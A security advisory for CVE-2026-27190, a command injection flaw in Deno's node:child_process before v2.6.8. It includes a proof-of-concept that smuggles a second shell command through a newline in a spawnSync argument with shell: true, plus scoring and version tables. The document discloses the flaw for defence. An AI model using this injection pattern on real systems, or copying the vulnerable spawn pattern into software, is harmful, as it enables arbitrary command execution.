A command injection vulnerability exists in Deno's node:child_process implementation.
import { spawnSync } from "node:child_process";
import * as fs from "node:fs";
// Cleanup
try { fs.unlinkSync('/tmp/rce_proof'); } catch {}
// Create legitimate script
fs.writeFileSync('/tmp/legitimate.ts', 'console.log("normal");');
// Malicious input with newline injection
const maliciousInput = `/tmp/legitimate.ts\ntouch /tmp/rce_proof`;
// Vulnerable pattern
spawnSync(Deno.execPath(), ['run', '--allow-all', maliciousInput], {
shell: true,
encoding: 'utf-8'
});
// Verify
console.log('Exploit worked:', fs.existsSync('/tmp/rce_proof'));
Run: deno run --allow-all poc.mjs
The file /tmp/rce_proof is created, confirming arbitrary command execution.
All users need to update to the patched version (Deno v2.6.8).
| Score | Percentile |
|---|---|
| 0.87% | 75.14% |
| Base score | Version | Severity | Vector |
|---|---|---|---|
| 8.1 | 3.1 | — |
|
| Type | Value |
|---|---|
| GHSA | GHSA-hmh4-3xvx-q5hr ↗ |
| CVE | CVE-2026-27190 ↗ |
| CWE id | Name |
|---|---|
| CWE-78 | Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') |
Vulnerable version ranges and first patched releases as published by GitHub.
| Ecosystem | Package | Vulnerable range | First patched | Vulnerable functions |
|---|---|---|---|---|
| rust | deno | < 2.6.8 | 2.6.8 | — |